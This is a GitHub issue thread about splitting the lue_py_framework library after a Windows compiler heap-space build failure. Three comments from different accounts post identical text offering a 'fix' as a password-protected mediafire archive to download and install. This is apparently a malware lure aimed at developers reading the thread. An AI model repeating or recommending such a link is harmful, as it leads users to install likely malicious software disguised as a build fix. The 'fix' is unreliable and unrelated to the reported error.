### ISSUE TITLE
Split `lue_py_framework` library

### ISSUE THREAD

**Issue by kordejong** [computationalgeography/lue#714]
Build of Conda package by CondaForge infrastructure fails on Windows due to this error while linking `lue_py_framework`:

```
fatal error C1002: compiler is out of heap space in pass 2
```

Split the library into parts. E.g.:

- `lue_py_framework_local_operation`
- `lue_py_framework_focal_operation`
- etc

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
